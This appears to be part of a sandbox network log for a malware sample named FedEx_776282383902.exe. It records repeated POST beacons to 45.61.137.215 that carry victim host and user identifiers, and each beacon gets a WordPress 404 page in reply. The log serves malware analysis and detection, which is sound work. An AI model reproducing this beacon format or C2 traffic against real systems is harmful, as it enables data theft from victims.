May 22, 2024 22:01:57.012926102 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:01:57.015175104 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:01:57.016339064 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:01:57.016352892 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:01:57.016360998 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:01:57.018665075 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:01:57.019728899 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49716	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:57.173480988 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:01:57.224083900 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:00.492105007 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:57 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:00.493233919 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:02:00.495753050 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:02:00.498325109 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:02:00.498349905 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:02:00.498368979 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:02:00.503356934 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 22, 2024 22:02:00.505948067 CEST	1236	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 22, 2024 22:02:00.505974054 CEST	1236	IN	Data Raw: 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d Data Ascii: nous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--c
May 22, 2024 22:02:00.511156082 CEST	1236	IN	Data Raw: 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49717	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:00.654650927 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:00.696085930 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:03.367727995 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:03.369915962 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:03.374491930 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:03.379290104 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 22, 2024 22:02:03.379306078 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 22, 2024 22:02:03.379316092 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 22, 2024 22:02:03.388897896 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:03.392338991 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:03.392354012 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:03.392359972 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49718	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:03.530500889 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:03.584224939 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:06.604466915 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:06.605866909 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
